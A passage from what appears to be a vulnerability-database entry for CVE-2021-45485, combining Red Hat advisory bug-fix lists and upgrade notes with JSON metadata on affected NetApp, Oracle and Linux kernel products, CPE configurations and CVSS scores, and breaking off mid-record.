- Redirect URL is now to the details page after created a policy 2072342 - Shows "NaN%" in the ring chart when add the disabled policy into policyset and view its details 2072350 - CRD Deployed via Application Console does not have correct deployment status and spelling 2072359 - Report the error when editing compliance type in the YAML editor and then submit the changes 2072504 - The policy has violations on the failed managed cluster 2072551 - URL dropdown is not being rendered with an Argo App with a new URL 2072773 - When a channel is deleted and recreated through the App Wizard, application creation stalls and warning pops up 2072824 - The edit/delete policyset button should be greyed when using viewer check 2072829 - When Argo App with jsonnet object is deployed, topology and cluster status would fail to display the correct statuses. 2073179 - Policy controller was unable to retrieve violation status in for an OCP 3.11 managed cluster on ARM hub 2073330 - Observabilityy - memory usage data are not collected even collect rule is fired on SNO 2073355 - Get blank page when click policy with unknown status in Governance -> Overview page 2073508 - Thread responsible to get insights data from ks clusters is broken 2073557 - appsubstatus is not deleted for Helm applications when changing between 2 managed clusters 2073726 - Placement of First Subscription gets overlapped by the Cluster Node in Application Topology 2073739 - Console/App LC - Error message saying resource conflict only shows up in standalone ACM but not in Dynamic plugin 2073740 - Console/App LC- Apps are deployed even though deployment do not proceed because of "resource conflict" error 2074178 - Editing Helm Argo Applications does not Prune Old Resources 2074626 - Policy placement failure during ZTP SNO scale test 2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store 2074803 - The import cluster YAML editor shows the klusterletaddonconfig was required on MCE portal 2074937 - UI allows creating cluster even when there are no ClusterImageSets 2075416 - infraEnv failed to create image after restore 2075440 - The policyreport CR is created for spoke clusters until restarted the insights-client pod 2075739 - The lookup function won't check the referred resource whether exist when using template policies 2076421 - Can't select existing placement for policy or policyset when editing policy or policyset 2076494 - No policyreport CR for spoke clusters generated in the disconnected env 2076502 - The policyset card doesn't show the cluster status(violation/without violation) again after deleted one policy 2077144 - GRC Ansible automation wizard does not display error of missing dependent Ansible Automation Platform operator 2077149 - App UI shows no clusters cluster column of App Table when Discovery Applications is deployed to a managed cluster 2077291 - Prometheus doesn't display acm_managed_cluster_info after upgrade from 2.4 to 2.5 2077304 - Create Cluster button is disabled only if other clusters exist 2077526 - ACM UI is very very slow after upgrade from 2.4 to 2.5 2077562 - Console/App LC- Helm and Object bucket applications are not showing as deployed in the UI 2077751 - Can't create a template policy from UI when the object's name is referring Golang text template syntax in this policy 2077783 - Still show violation for clusterserviceversions after enforced "Detect Image vulnerabilities " policy template and the operator is installed 2077951 - Misleading message indicated that a placement of a policy became one managed only by policy set 2078164 - Failed to edit a policy without placement 2078167 - Placement binding and rule names are not created in yaml when editing a policy previously created with no placement 2078373 - Disable the hyperlink of *ks node in standalone MCE environment since the search component was not exists 2078617 - Azure public credential details get pre-populated with base domain name in UI 2078952 - View pod logs in search details returns error 2078973 - Crashed pod is marked with success in Topology 2079013 - Changing existing placement rules does not change YAML file 2079015 - Uninstall pod crashed when destroying Azure Gov cluster in ACM 2079421 - Hyphen(s) is deleted unexpectedly in UI when yaml is turned on 2079494 - Hitting Enter in yaml editor caused unexpected keys "key00x:" to be created 2079533 - Clusters with no default clusterset do not get assigned default cluster when upgrading from ACM 2.4 to 2.5 2079585 - When an Ansible Secret is propagated to an Ansible Application namespace, the propagated secret is shown in the Credentials page 2079611 - Edit appset placement in UI with a different existing placement causes the current associated placement being deleted 2079615 - Edit appset placement in UI with a new placement throws error upon submitting 2079658 - Cluster Count is Incorrect in Application UI 2079909 - Wrong message is displayed when GRC fails to connect to an ansible tower 2080172 - Still create policy automation successfully when the PolicyAutomation name exceed 63 characters 2080215 - Get a blank page after go to policies page in upgraded env when using an user with namespace-role-binding of default view role 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2080503 - vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes 2080567 - Number of cluster in violation in the table does not match other cluster numbers on the policy set details page 2080712 - Select an existing placement configuration does not work 2080776 - Unrecognized characters are displayed on policy and policy set yaml editors 2081792 - When deploying an application to a clusterpool claimed cluster after upgrade, the application does not get deployed to the cluster 2081810 - Type '-' character in Name field caused previously typed character backspaced in in the name field of policy wizard 2081829 - Application deployed on local cluster's topology is crashing after upgrade 2081938 - The deleted policy still be shown on the policyset review page when edit this policy set 2082226 - Object Storage Topology includes residue of resources after Upgrade 2082409 - Policy set details panel remains even after the policy set has been deleted 2082449 - The hypershift-addon-agent deployment did not have imagePullSecrets 2083038 - Warning still refers to the klusterlet-addon-appmgr pod rather than the application-manager pod 2083160 - When editing a helm app with failing resources to another, the appsubstatus and the managedclusterview do not get updated 2083434 - The provider-credential-controller did not support the RHV credentials type 2083854 - When deploying an application with ansiblejobs multiple times with different namespaces, the topology shows all the ansiblejobs rather than just the one within the namespace 2083870 - When editing an existing application and refreshing the Select an existing placement configuration, multiple occurrences of the placementrule gets displayed 2084034 - The status message looks messy in the policy set card, suggest one kind status one a row 2084158 - Support provisioning bm cluster where no provisioning network provided 2084622 - Local Helm application shows cluster resources as Not Deployed in Topology [Upgrade] 2085083 - Policies fail to copy to cluster namespace after ACM upgrade 2085237 - Resources referenced by a channel are not annotated with backup label 2085273 - Error querying for ansible job in app topology 2085281 - Template name error is reported but the template name was found in a different replicated policy 2086389 - The policy violations for hibernated cluster still be displayed on the policy set details page 2087515 - Validation thrown out in configuration for disconnect install while creating bm credential 2088158 - Object Storage Application deployed to all clusters is showing unemployed in topology [Upgrade] 2088511 - Some cluster resources are not showing labels that are defined in the YAML

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.8.53. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2022:7873

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html

Security Fix(es):

  • go-getter: command injection vulnerability (CVE-2022-26945)
  • go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)
  • go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)
  • go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html

You may download the oc tool and use it to inspect release image metadata for x86_64, s390x, and ppc64le architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture) The image digest is sha256:ac2bbfa7036c64bbdb44f9a74df3dbafcff1b851d812bf2a48c4fabcac3c7a53

(For s390x architecture) The image digest is sha256:ac2c74a664257cea299126d4f789cdf9a5a4efc4a4e8c2361b943374d4eb21e4

(For ppc64le architecture) The image digest is sha256:53adc42ed30ad39d7117837dbf5a6db6943a8f0b3b61bc0d046b83394f5c28b2

All OpenShift Container Platform 4.8 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

2077100 - Console backend check for Web Terminal Operator incorrectly returns HTTP 204 2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3) 2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3) 2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3) 2092928 - CVE-2022-26945 go-getter: command injection vulnerability

  1. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-2205 - Prefer local dns does not work expectedly on OCPv4.8 OCPBUGS-2347 - [cluster-api-provider-baremetal] fix 4.8 build OCPBUGS-2577 - [4.8] ETCD Operator goes degraded when a second internal node ip is added OCPBUGS-2773 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name OCPBUGS-2989 - [4.8] cri-o should report the stage of container and pod creation it's stuck at

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202112-2255",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "all flash fabric-attached storage 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13.3"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h615c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications cloud native core policy",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "22.2.0"
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fabric-attached storage 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications cloud native core network exposure function",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "22.1.1"
      },
      {
        "model": "fabric-attached storage a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fabric-attached storage 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "all flash fabric-attached storage 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications cloud native core binding support function",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "22.1.3"
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller software",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci baseboard management controller h300e",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "fas/aff baseboard management controller a400",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fas/aff baseboard management controller 8700",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci baseboard management controller h410c",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire enterprise sds \u0026 hci storage node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire \u0026 hci management node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci baseboard management controller h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fas/aff baseboard management controller 8300",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.13.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:22.1.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:22.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_network_exposure_function:22.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:all_flash_fabric-attached_storage_8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:all_flash_fabric-attached_storage_8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fabric-attached_storage_8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fabric-attached_storage_8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:all_flash_fabric-attached_storage_8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:all_flash_fabric-attached_storage_8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fabric-attached_storage_8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fabric-attached_storage_8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fabric-attached_storage_a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fabric-attached_storage_a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h615c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h615c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "PACKETSTORM",
        "id": "167330"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "167459"
      },
      {
        "db": "PACKETSTORM",
        "id": "169941"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2021-45485",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2021-45485",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-409116",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
